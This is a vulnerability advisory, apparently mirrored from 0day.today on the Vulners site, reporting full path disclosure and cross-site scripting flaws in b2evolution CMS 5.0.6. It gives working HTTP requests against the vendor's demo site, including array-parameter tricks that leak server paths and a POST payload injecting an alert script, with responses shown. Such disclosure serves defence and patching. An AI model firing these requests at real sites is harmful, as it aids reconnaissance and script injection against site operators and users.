Vulners
Lucene search
b2evolution CMS 5.0.6 - XSS & FPD Vulnerabilities
#Title: b2evolution CMS 5.0.6 - XSS & FPD
#Version: 5.0.6 (Latest ATM)
#Vendor: b2evolution.net - en.wikipedia.org/wiki/B2evolution
#Demo: demo3.b2evolution.net
#Date: 01.25.2014
#Contact: smash[at]devilteam.pl
1. Full Path Disclosure
A) Paged
Request:
demo3.b2evolution.net/stable/blog1.php?paged[]= OR demo3.b2evolution.net/stable/blog1.php?paged=[]
Response:
Warning: Cannot modify header information - headers already sent by (output started at /home/b2evodemo/www/stable/inc/_core/model/_pagecache.class.php:506) in /home/b2evodemo/www/stable/inc/_core/_misc.funcs.php on line 5480
b) Login
Request:
POST /stable/blog1.php?disp=login&redirect_to=%2Fstable%2Fblog1.php%2Fwelcome-to-b2evolution%3Fdisp%3Dsingle%26title%3Dwelcome-to-b2evolution%26more%3D1%26c%3D1%26tb%3D1%26pb%3D1&source=menu%20link HTTP/1.1
Host: demo3.b2evolution.net
x[]=&q[]=
Response:
Notice: Array to string conversion in /home/b2evodemo/www/stable/inc/_init_login.inc.php on line 112
(...)
Warning: Cannot modify header information - headers already sent by (output started at /home/b2evodemo/www/stable/inc/_init_login.inc.php:112) in /home/b2evodemo/www/stable/inc/_core/_template.funcs.php on line 59
c) Display
Request:
demo3.b2evolution.net/stable/blog1.php?disp[]=comments
Response:
Warning: preg_match() expects parameter 2 to be string, array given in /home/b2evodemo/www/stable/inc/_core/_param.funcs.php on line 298
d) Page
Request:
demo3.b2evolution.net/stable/blog1.php/this-is-a-multipage-post?page[]=
Response:
Warning: Cannot modify header information - headers already sent by (output started at /home/b2evodemo/www/stable/inc/_core/model/_pagecache.class.php:506) in /home/b2evodemo/www/stable/inc/_core/_misc.funcs.php on line 5480
e) Redirect_to
Request:
demo3.b2evolution.net/stable/blog4.php?disp=msgform&recipient_id=4&redirect_to[]=http%3A%2F%2Fdemo3.b2evolution.net%2Fstable%2Fblog4.php%3Fdisp%3Dmsgform%26recipient_id%3D4
Response:
Warning: Cannot modify header information - headers already sent by (output started at /home/b2evodemo/www/stable/inc/_core/model/_pagecache.class.php:506) in /home/b2evodemo/www/stable/inc/_core/_misc.funcs.php on line 2404
f) Recipient_id
Request:
demo3.b2evolution.net/stable/blog4.php?disp=msgform&recipient_id[]=4&redirect_to=http%3A%2F%2Fdemo3.b2evolution.net%2Fstable%2Fblog4.php%3Fdisp%3Dmsgform%26recipient_id%3D4
Response:
Warning: Cannot modify header information - headers already sent by (output started at /home/b2evodemo/www/stable/inc/_core/model/_pagecache.class.php:506) in /home/b2evodemo/www/stable/inc/_core/_misc.funcs.php on line 5480
2. Cross Site Scripting
a) POST - params_form_title_start & params_form_title_end
Request:
POST /stable/htsrv/anon_async.php HTTP/1.1
Host: demo3.b2evolution.net
action=get_comment_form&p=44&blog=2&disp=single¶ms%5BItem%5D=null¶ms%5Bdisp_comments%5D=true¶ms%5Bdisp_comment_form%5D=true¶ms%5Bdisp_trackbacks%5D=false¶ms%5Bdisp_trackback_url%5D=false¶ms%5Bdisp_pingbacks%5D=true¶ms%5Bdisp_section_title%5D=true¶ms%5Bdisp_rating_summary%5D=true¶ms%5Bbefore_section_title%5D=%3Ch3+class%3D%22feedback_section%22%3E¶ms%5Bafter_section_title%5D=%3C%2Fh3%3E¶ms%5Bcomments_title_text%5D=¶ms%5Bcomment_list_start%5D=%0A%0A¶ms%5Bcomment_list_end%5D=%0A%0A¶ms%5Bcomment_start%5D=%3Cdiv+class%3D%22bComment%22%3E¶ms%5Bcomment_end%5D=%3C%2Fdiv%3E¶ms%5Bpreview_start%5D=%3Cdiv+class%3D%22bComment%22+id%3D%22comment_preview%22%3E¶ms%5Bpreview_end%5D=%3C%2Fdiv%3E¶ms%5Bcomment_error_start%5D=%3Cdiv+class%3D%22bComment%22+id%3D%22comment_error%22%3E¶ms%5Bcomment_error_end%5D=%3C%2Fdiv%3E¶ms%5Bcomment_template%5D=_item_comment.inc.php¶ms%5Blink_to%5D=userurl%3Euserpage¶ms%5Bform_title_start%5D=<script>alert(666)</script>params%5Bform_title_end%5D=%3C%2Fh3%3E¶ms%5Bdisp_notification%5D=true¶ms%5Bnotification_before%5D=%3Cdiv+class%3D%22comment_notification%22%3E¶ms%5Bnotification_text%5D=This+is+your+post.+You+are+receiving+notifications+when+anyone+comments+on+your+posts.¶ms%5Bnotification_text2%5D=You+will+be+notified+by+email+when+someone+comments+here.¶ms%5Bnotification_text3%5D=Notify+me+by+email+when+someone+comments+here.¶ms%5Bnotification_after%5D=%3C%2Fdiv%3E¶ms%5Bfeed_title%5D=%23
Response:
HTTP/1.1 200 OK
Date: Sat, 25 Jan 2014 12:55:03 GMT
Server: Apache
Expires: Sat, 25 Jan 2014 12:55:03 +0000
Last-Modified: Sat, 25 Jan 2014 12:55:03 +0000
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 3025
Connection: close
Content-Type: text/html; charset=iso-8859-1
<a id="form_p44"></a><script>alert(666)</script>params[form_title_end]=</h3>Leave a comment</h3>
# 0day.today [2018-01-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jan 2014 00:00Current
6.7Medium risk
Vulners AI Score6.7